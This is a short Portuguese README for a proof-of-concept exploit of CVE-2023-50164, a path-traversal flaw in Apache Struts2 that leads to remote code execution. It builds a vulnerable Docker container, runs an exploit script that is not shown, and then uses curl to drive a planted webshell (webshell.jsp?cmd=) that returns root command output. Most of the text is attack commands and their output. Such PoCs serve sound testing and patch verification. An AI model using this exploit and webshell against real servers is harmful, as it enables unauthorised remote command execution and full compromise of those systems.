
CVE-2023-50164 (vulnerabilidade de path traversal para RCE no Apache Struts) - Prova de Conceito
Esta PoC foi criada para testar uma RCE (Execução Remota de Código) explorando a vulnerabilidade do Apache Struts2.

Construa a imagem e execute um container:
$ DOCKER_BUILDKIT=1 docker build . -t struts2-rce-poc && docker run --rm -p 8080:8080 struts2-rce-poc
Execute o exploit:
$ cd exploit
$ ./exploit.sh
Agora você pode executar comandos arbitrários no lado do servidor, conforme mostrado:
$ curl http://localhost:8080/webshell/webshell.jsp\?cmd\=id%20-a
uid=0(root) gid=0(root) groups=0(root)